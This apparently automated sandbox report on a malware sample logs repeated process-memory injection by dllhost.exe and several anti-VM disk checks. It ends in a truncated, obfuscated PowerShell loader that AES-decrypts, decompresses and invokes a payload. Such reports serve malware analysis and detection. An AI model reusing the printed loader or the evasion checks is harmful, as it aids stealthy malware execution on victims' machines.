Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 10E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A4670000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A46A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 21D595A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 21D59C90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EA080B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085AEE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 29E3BCD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 29E3BF00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1956F090000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2A3ED7F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CD8E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CF9E0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF30000
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, 